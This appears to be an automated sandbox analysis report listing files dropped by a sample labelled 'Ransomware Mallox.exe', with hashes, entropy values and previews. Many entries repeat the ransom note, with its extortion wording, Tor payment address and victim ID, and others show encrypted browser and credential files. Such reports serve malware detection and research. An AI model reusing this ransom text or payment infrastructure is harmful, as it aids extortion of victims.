                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11212
                    Entropy (8bit):7.983432249280393
                    Encrypted:false
                    SSDEEP:192:D0FXdZnmHJDOzTfa00BHbyiglTpB2pDb3DPJUgUOssMVsyWfPhXIPWIA:GSJDOzTi00BOlL2p4OssMVsyWfPhPIA
                    MD5:F946E0B72A68F36044B37411CDFB8A6E
                    SHA1:299843AC923E5FC7D822DEEF77EF7A36B31C5458
                    SHA-256:EC68D029BF844793A086B6F56BDFC6F34C7203D41168B2C3F712B54B239C57EA
                    SHA-512:69DB5F0AE297D6041A291997844A03204C15DEFE71C91A3A3657EE6DFEA5EBDE2AEAB7BF5EBCAA25A68AD6484BC8B6E3FFFEEA7AC31FE5EFBC993BB9B8A8D0BD
                    Malicious:false
                    Preview:!./.N.....L.R.....x......U.s.=k....?.|.O..N...V/.....'N.}...^e..c.Scd..l.."..J.X..l....6; .......-.uX.....2....N>....auU......^.c/.E..}.....9.1..x.Y.....(.C........x.V.....A..|.p?.X....9...8.....':.q./Z.Uc.G...f.<.%..".r..T..~.........%....".X.gf.}..T..3.@..v7....]5.2.;..sE.I.C..c...v...V...N..`.0b.....D....4~.Wyx......I.l#..E.[.}.q..CT...+94.....Ld.J....x..LD.c.....$........;.O3...Q.y'f;....W..D\l...k..oZ6..n...&h.q3....7....~.R.lB7.V......x].._....w-.2..D#.\C...a.]UL.u.sdc...2.E{..<.5..O.:............'u&}j(...:.d....q..,....H..:@GKx$......n.n..'.N.t_.....$.....u~..R.I[.:...m+u.N..... .p...U.cNgm...k.....p........|m....F.......&...S.m6o..lA...\.@..X< .......V......uH=.../..1....TN..1......I....O.s. M..!...'..37T.et..k.b....y...({......)..o.........4.....]..\:.Z..}...<J,..a....&...E.ea...R7...l).Z[6Jk......D7Z.(.......4..D%M.|.../...T...M[."..bje.C...q...z.....n.........S.s:......V.r..5....C._..;Q.b....HSp...N(y.n..a....".6X..s%.......

                    C:\Users\user\AppData\Local\Microsoft\Credentials\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):94442
                    Entropy (8bit):7.997903006328152
                    Encrypted:true
                    SSDEEP:1536:UwHRIhiswOXQqBFkoWpIHY+h+GE6gePowTrYagLZ+uZ8iK7XsnA0zxAtEZugW:NyJwOXQWkoWi4f6gy/vqpGo1DuJ
                    MD5:4A43540D9F6C39CC29EB5E82B91C0639
                    SHA1:347B3E990541164653343638DC8EB00C8231FFF3
                    SHA-256:17E299B815CF6D2476CE94F84DC0A1386A09664E8133A2EDC0C1D5B989B082C8
                    SHA-512:4E9072ADC58B778943882275FF3BC08FC3D3C0456EA1C1A885C9628B00A7E04ECB86481DF03C4CC3A21C8140FFCE44D26E639A7CA001E5BD5B21C4B3041DDDE8
                    Malicious:true
                    Preview:......bR~.....ysA.]N..P..._.-@.i.(.g..t"..C...*dxkf..I...v.%8. .]......U....6h...]....x.2..By.0W._6%+2Y.(.B.".E.....hh..[e......n......#..!Q.w.p.W..o./.8........u..Z5...X~.k.}.....:.;.#.U.....$.L%N.q..4.&.)....]..?.&..i.e...&..Y...Sx"...'R"5K..b)....{L..y....).U.3.r..e....c...L.H.h.....}.%..*.Z..,...xB..Xb.F....7b."FTP.<.F.%j.G.h..b....,r.M>*..jT....'...Bx.&..%.C`.[..B..m*.m+3.@...#..+0lx...!..J!%..I9...v1n..7d.w........0....Q..Jy.A..(...>..,6h.G.....%F..V>.x.^.2...I....R....i.V..*p.*....v..l.(.]'..i3(.......".....X.....RS.ja...A...~..J.5.=^nR......Ji.:P:.....IQ.N.}5...Ki.....>.8.....Q.......+..x...m,..1....{zaw#...w.=^G.i..]u.h.8......K<.O.0>$..5...1..L%..../..$..?w..F....u..a.....#/77t.\..?...]..W..*..|.a...x..1.z...h..w...|i.=$.7.n.U.]..IO..^........3g..V.,.5OA.RA}....Y2N.".'.:=T.B..DL.W.,W&.....]..Y..w4.u...s.37...9hi....K...$..B..QN.M..8k.x...7..e.......`M)..k.UH.[\.v...}.9..G_..".7..X.@v.o^...;$U....O.....\\\....FP

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\edge_autofill_field_data.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):217832
                    Entropy (8bit):7.999238668236431
                    Encrypted:true
                    SSDEEP:6144:+TvsEcfWMONu3bNgdJFO94X7o/CBJP887f1OiD5ffbdlh3jE7:nbTR36dJgWLwup8UfounbdHzE7
                    MD5:CDFBD29AABFCB0805620D0F27596FB5F
                    SHA1:D172AE673E00C92469FA4769C6F21AA3965445F9
                    SHA-256:A1A743D1D4FF723E1503143A2F400964B5B0BB9D38D5696E441FA4311176C7CC
                    SHA-512:B07649AA8F442393FC472EB5CC63886B98F52A1A180998CF3679E71712C7EDC46E2DA061C452B337F2961D972015E34FD0751785B5E419CF2605E2DC64F29BDC
                    Malicious:true
                    Preview:..2.Jq...+..*..B...t.Q..\n..._..<.`.Lcn_y&.m.a lb....!...Y.C..>.8...B.}...Q.d.Y.prfp.J..r.z..`p...9.G.$.-(G ".+..<..%...D.hyk-.~.&'..7..<Z/.t.aldf|..s.....l..c....q.....R.-.m....n.MU,e-.1...X_T.Ik:.._..........:O\k<......Ca.;..Ff....#.K.H...b.V..l.,B.yh..._.K3B...........%..%f.7.|...~.^....y'=.C....9.. WK.D..rw.|.U}...m#.1 .M.a......<7'..rl....,F..E.6.H...-....4Q+cm....yK..i&M\......._.@.5...b..iI.^...zo....a.b._..........I....jI.).r...JC;.G...........)a....N.k...j..M.X.i'Bm.-..ab..FAwMT...y...._.:...t....c..w......{I.KL...B7..'.....7.9eTp.)K;0.+@......)k...8......Rub...M....Ba|6.?..6...B.,h...).)3....|.C....$.S.9.C.~.0...Z..8...L.m{q..$..1t....y+R.m..v....h8u.f<.k....uG.h=M}.%...8qq...\.....Wv'../>.7).:2..=.[.*v.5P...... ..]...IT.2^..m..Hc...k.2.9..).x._.........<..es].eR..L.0V..I.Tv....K.....80..c.6@.`f.....jQ..`..)L..Hv.>.M.N..T..6l.....}!....J..?9;.z%?.c...i...r..v\.I............n3E.(0.E.U.|.[ 3.~.bo.".w....,).m....S.w..z0.u...v...A7oM

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\v1FieldTypes.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):519916
                    Entropy (8bit):7.999651233187555
                    Encrypted:true
                    SSDEEP:12288:HxiZj9juUbAi6Kr2oneSJ64ang/DCG8y6YkgnIz62b:HUJxtkfe64ag/2G8y6WSb
                    MD5:274A0B548F679B5ABFAC15D0C5B58D34
                    SHA1:E67B13149341DBD745E7F10A2A45D8CD01C6AA0D
                    SHA-256:8CCCF9826F6506EFFD9D7C1B7E1B3F5431EA61D38E28E93B221886DFC8571217
                    SHA-512:8E2AA22B1F4B1CE940850F06B572C06B508655DAFE4CA9681C54852B5CB4019D7B5C3E0FF2EFB4B0D2322A47F9BE72AEF7C79D89A7C43A82982B1F3D27B69DD9
                    Malicious:true
                    Preview:~v>....,p..0O....S..Zq\_f%k.........0._........a..e....q.M.;0.b.......l.j..l...@(....r......Y....BJr..v.j.7.T.2},5%......OV.."...5.b...XA..."...],..z.(...C...r6..=g..[...C^s.Rkj@Ba...[fu.^.g..wy^..t.{vK.+..y^X..@...8.ZI...(..W3R+...Z.h@XR.G .....[.y4...U...-.*.......;A...@.T....._...i.....9.L:.m...c...7D&#@L.#J./C1^...!..EA).Jm(..d|x......t@....r..%5..Y.H/...."..BX....$....;.9T....+{-!.#.|5........%.}}L.J.H'.|....p.K..3..w3...VM...]-...*...uyO..?..Lk.g.l...h7..H.. gW25....^S%.....:.Y.k4,.o..:8(.(.T..F...]t..._.s...+8..].._OD..E..n...1......N...{$..3..$I.J..]el.;t/Hz.|..,n..5.......rXB-..W.s>.....y.....x.4.a..p....7..gP....v..I.?P>........x.y......c3.....T{......8.y.sy...W............C.....e..t.s.=y/.k.d..=..N$.3.:...2.....g..St$.P.N}..M..WN....>.r..N.......[)..&..;..#s*Gw......\.......G..2.s[.}.....1....M.=....s..q.......=ZY..g..f..".....5.).\L.t....'\..=.h......7..<0..f....$../....t....O:Zp.........w..n..\G..*.T->....J.....=....V.s..HV..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
